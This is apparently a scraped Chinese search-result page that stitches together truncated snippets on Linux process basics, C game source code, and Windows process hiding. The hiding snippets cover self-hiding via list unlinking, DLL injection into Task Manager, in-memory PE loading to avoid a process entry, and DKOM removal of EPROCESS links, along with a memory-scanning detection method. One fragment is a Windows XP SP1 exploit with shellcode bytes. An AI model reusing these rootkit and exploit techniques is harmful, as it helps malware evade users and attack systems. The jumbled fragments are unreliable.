进程 每个进程在内核中都有一个进程控制块(PCB)来维护进程相关的信息,Linux内核的进程控制块是task_struct结构体。进程id。系统中每个进程有唯一的id,在C语言中用pid_t类型表示。...内核根据父进程复制出一个子进程,父进程和子进程的PCB信息相同,用户态代码和数据也相同。因此,子进程现在的状态看起来和父进程一样,做完了初始化,刚调用了fork进入内核,还没有从内核返回。...是父进程先返回还是子进程先返回,还是这两个进程都等待,先去调度执行别的进程,这都不一定,取决于内核的调度算法。...任何进程在刚终止时都是僵尸进程,正常情况下,僵尸进程都立刻被父进程清理了。如果一个父进程终止,而它的子进程还存在(这些子进程或者仍在运行,或者已经是僵尸进程了),则这些子进程的父进程改为init进程。...进程间通信每个进程各自有不同的用户地址空间,任何一个进程的全局变量在另一个进程中都看不到,所以进程之间要交换数据必须通过内核,在内核中开辟一块缓冲区,进程1把数据从用户空间拷到内核缓冲区,进程2再从内核缓冲区把数据读走
大致要求就是要实现自启动和自我隐藏。我使用的都是些简单的技术,只是实现自我隐藏稍微让我花费了点时间写算法。其实这个算法也很简单,就是大学时候写的从一个单向链表中删除一个元素。...); // 获取调用模块的名称 WCHAR* pFileName= NULL; pFileName = PathFindFileName(FilaPath); // 这是计算进程名在结构体中的偏移...PCHAR pchNameAddr = NULL; // 过滤第一个进程system idle。...这个进程在这个进程信息结构体中没有名字 if( FALSE !...= bidle ) { // 获取指向进程名的指针 memcpy_s( &pchNameAddr, sizeof(PCHAR), (PVOID)(pchCurrentAddr+dwnameoffset
之前测试过在进程管理器中隐藏进程的方法,现把代码公开: #define _CRT_SECURE_NO_WARNINGS #include #include #...{ case DLL_PROCESS_ATTACH: StartHook(); break; } return TRUE; } 将其注入到进程管理器进程中...,即可隐藏指定进程,当然在tasklist中依旧存在,win10 x86测试成功。
众所周知,windows下可执行文件必须符合一定的格式要求,微软官方称之为PE文件(关于PE文件的详细介绍这里就不赘述了,google一下可以找到大把);用户在界面双击exe时,有个叫做explorer的进程会监测并接受到这个事件...然后根据注册表中的信息取得文件名,再以Explorer.exe这个文件名调用CreateProcess函数去运行用户双击的exe;PC中用户一般都是这样运行exe的,所以很多用户态的exe都是exlporer的子进程...分配内存 既然是运行,肯定是需要放在内存的,所以首先要开辟内存空间,才能把exe从磁盘加载进来;以32位为例,由于每个进程都有自己的4GB虚拟空间,所以还涉及到新生成页表、填充CR3等琐碎的细节工作...//将内存中的exe数据映射到peloader进程内存中,避免重新生成一个进程,这是隐藏exe的方式之一 if (FALSE == MapFile(pFileBuff, chBaseAddress...,然后运行exe的,所以exe的代码和数据其实都在loader的空间,并未单独生成一个进程,所以任务管理器、process hacker是都查不到的!
#include #include #include // 来自公众号:c语言与cpp编程 /*迷宫的数组*/ int maze[100]
我们前面说过几种隐藏进程的方法: 遍历进程活动链表(ActiveProcessLinks) 遍历PspCidTable表检测隐藏进程 但还是不能防止别人通过各种方法来隐藏进程,所以下面来介绍一种通过暴力搜索内存枚举进程的方法...一个进程要运行,必然会加载到内存中。基于这个事实,隐藏进程要在目标机运行,在内存中一定会存在对应的EPROCESS结构体。...基于系统内存搜索的进程监测技术利用EPROCESS结构体特征找到EPROCESS地址指针进而输出进程信息,可以有效地对进程进行全面的监测。 那我们应该搜索进程的什么结构?...image 可以看到除了system,其他进程的PEB都是0x7ffdxxxx.为什么? 找到wrk源码,MiCreatePebOrTeb这个函数负责分配peb和teb的地址。...8bec mov ebp,esp 83e2c71c 8b5508 mov edx,dword ptr [ebp+8] 83e2c71f e8c6260a00
DKOM 就是直接内核对象操作技术,我们所有的操作都会被系统记录在内存中,而驱动进程隐藏的做旧就是操作进程的EPROCESS结构与线程的ETHREAD结构、链表,要实现进程的隐藏我们只需要将某个进程中的信息...,在系统EPROCESS链表中摘除即可实现进程隐藏。...// 活动的线程 +0x32c ImagePathHash : Uint4B // 镜像路径的Hash值 +0x338 Peb...ActiveProcessLinks 该指针把每个进程的EPROCESS结构体连接成了双向链表,我们可以使用 ZwQuerySystemInformation 这个函数来遍历出所有的进程信息,要实现进程的隐藏...,只需要将某个进程的EPROCESS从结构体中摘除,那么通过ZwQuerySystemInformation函数就无法遍历出被摘链的进程了,从而实现了进程的隐藏。
DKOM 就是直接内核对象操作技术,我们所有的操作都会被系统记录在内存中,而驱动进程隐藏的做旧就是操作进程的EPROCESS结构与线程的ETHREAD结构、链表,要实现进程的隐藏我们只需要将某个进程中的信息...,在系统EPROCESS链表中摘除即可实现进程隐藏。...DKOM 隐藏进程的本质是操作EPROCESS结构体,EPROCESS结构体中包含了系统中的所有进程相关信息,还有很多指向其他结构的指针,首先我们可以通过WinDBG在内核调试模式下输入dt_eprocess...// 活动的线程 +0x32c ImagePathHash : Uint4B // 镜像路径的Hash值 +0x338 Peb...,要实现进程的隐藏,只需要将某个进程的EPROCESS从结构体中摘除,那么通过ZwQuerySystemInformation函数就无法遍历出被摘链的进程了,从而实现了进程的隐藏。
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 /* #i nclude #i nclude #i nclude #i nclude #i nclude #define NORM “\033[00...targets[] = { // { “os”, go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr }, { “wXP SP1 all”, 0x77C0BF21...,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE, 0x9E,0xDE,0x49,0x47,0x8C,...0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE, 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,...0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE, 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,
1.进程ID 每一个进程都由一个唯一的标识符表示,即进程ID,简称pid.系统保证在某时刻每个pid都是唯一的。...1.1分配进程ID 缺省情况下,内核将进程ID的最大值限制为32768,可以在此处设置/proc/sys/kernel/pid_max,在短时间内,内核不会重用已经分配的ID. 2.获得进程id和父进程...当前进程就是父进程,创建成功的进程是子进程。...在父进程成功的fork()调用,会返回子进程的pid 在子进程fork()调用会返回0 #include #include int main(){...,pid=%d , ppid=%d ,我新建的子进程pid=%d\n",pi d,ppid,ret); sleep(3);//父进程不能太快终止,否则看不出子进程ppid
c#include #include #include #include #include .../*字符操作函数*/ #include #define BUFFSIZE 32 #define COL 128 #define ROW 64 // 来自公众号:c语言与cpp编程...printf(" Please input the express:\n"); /*输入字符串压回车键*/ scanf("%s%c"...\n"); scanf("%c",&ch); if(ch=='n'||ch=='N') break; } return
今天笔者为大家展示C语言写的贪吃蛇游戏,让大家玩一玩自己写的游戏~ 是纯C语言哦~VC6.0开发 无问题 首先,开始界面: 游戏界面如下: 部分代码截图如下: 笔者VC6.0下编写,测试无问题,可复制代码直接到...VC6源文件下,后缀为.c文件 可以编译通过运行~ 详细代码请访问C语言网 http://www.clang.cc/news/project/2015/0611/93.html
加载头文件*/ #include #include #include #include // 来自公众号:c语言与...if ((socketMul = WSASocket(AF_INET, SOCK_DGRAM, 0, NULL, 0, WSA_FLAG_MULTIPOINT_C_LEAF
include #include #include #include #include /*公众号:C语言与...CPP编程回复“源码”,获取30个源码项目*/ #define HEADER1 " -------------------------------BOOK TICKET----------------...(y/n)\n"); getchar(); scanf("%c",&ch); if(ch=='y'||ch=='Y') ...\n"); scanf("%c",&ch1); if(ch1=='y'||ch1=='Y') {
#include #include #include // 来自公众号:c语言与cpp编程 // 欢迎界面 void welcome(...outtextxy(100, 280, "功能并不很完善,比如生命数、分数等都没有写"); outtextxy(100, 320, "感兴趣的自己加进去吧"); // 实现闪烁的“按任意键继续” int c=...kbhit()) { setcolor(RGB(c, 0, 0)); outtextxy(280, 400, "按任意键继续"); c -= 8; if (c < 0) c = 255
%c 到达\t进程状态\n", a[k].name); printf("\n\t\t\t\t %s\n\n\n", jczt[processztsy]); if (processnum >= 1)...= 0) { printf("\t\t\t进程 %c 完成\n\n\n\n", a[k].name); } if ((k >= 1 && time >= a[k].arrivetime && time...= 0)) { printf("\t\t\t进程 %c 开始\n\n\n\n", a[k].name); } } if (time > a[n - 1].finishtime && a[n - 1]...= 1; } printf("\t\t进程 %c 到达\t进程状态\n\n\n\n", a[k].name); } } if (jcnum == 0) { //遍历数组 for (int i = jcnum...= 0) { printf("\t\t\t进程 %c 完成\n\n\n\n", a[jcnum - 1].name); //遍历数组 for (int i = jcnum; i < n; i++)
0x4b00 #define RIGHT 0x4d00 #define UP 0x4800 #define DOWN 0x5000 #define ESC 0x011b #define ENTER 0x1c0b...// 来自公众号:c语言与cpp编程 /*2墙壁,1可以移动地方,3自己,4敌人*/ int a[15][20]={2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,
DKOM 即直接内核对象操作,我们所有的操作都会被系统记录在内存中,而驱动进程隐藏就是操作进程的EPROCESS结构与线程的ETHREAD结构、链表,要实现进程的隐藏我们只需要将某个进程中的信息,在系统...EPROCESS链表中摘除即可实现进程隐藏。...+0x300 RundownProtect : _EX_RUNDOWN_REF +0x308 Flags2 : Uint4B在实现进程隐藏之前,需要通过代码的方式获取到当前系统中所有进程..."); DriverObject->DriverUnload = UnDriver; return STATUS_SUCCESS;}得到句柄以后直接摘除进程的结构即可实现隐藏,该代码只找了Win10..."); // 摘除结构中的C32Asm.exe实现驱动隐藏 HideProcess((PLIST_ENTRY)((ULONG64)PRoc + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET
= '#') { a[x][y] = ' '; y++; a[x][y] = 'o'; } } ---- 这个小游戏的器官大致就是这样 以下就是整个小游戏的源码
1.等待终止的子进程(僵死进程): 如果一个子进程在父进程之前结束,内核会把子进程设置为一个特殊的状态,处于这种状态的进程称为僵死进程 当父进程获取了子进程的信息后,子进程才会消失。...pid_t wait(int *status); 父进程调用这个方法会被阻塞住,如果子进程终止的时候,此方法会调用并且返回终止子进程的pid #include #include 0){ pid=getpid(); ppid=getppid(); printf("我是父进程...,pid=22315 , ppid=12479 ,我新建的子进程pid=22316 我是子进程,pid=22316 , ppid=22315 我的子进程,pid=22316,终止了 2.如果父进程在子进程之前终止了...,那么系统会把子进程设置给init进程(pid为1),init进程会周期性的等待所有的子进程,确保没有长时间的僵死进程
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
云直播
对象存储
